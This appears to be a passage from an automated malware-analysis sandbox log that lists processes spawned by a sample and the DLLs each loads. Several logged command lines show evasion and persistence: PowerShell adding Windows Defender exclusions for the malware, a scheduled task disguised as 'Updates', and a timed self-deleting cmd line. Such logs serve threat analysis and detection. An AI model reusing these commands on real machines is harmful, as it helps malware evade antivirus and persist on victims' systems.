Source: unknown	Process created: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\VQsnGWaNi5.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Users\user\Desktop\VQsnGWaNi5.exe "C:\Users\user\Desktop\VQsnGWaNi5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\VQsnGWaNi5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Section loaded: cryptbase.dll
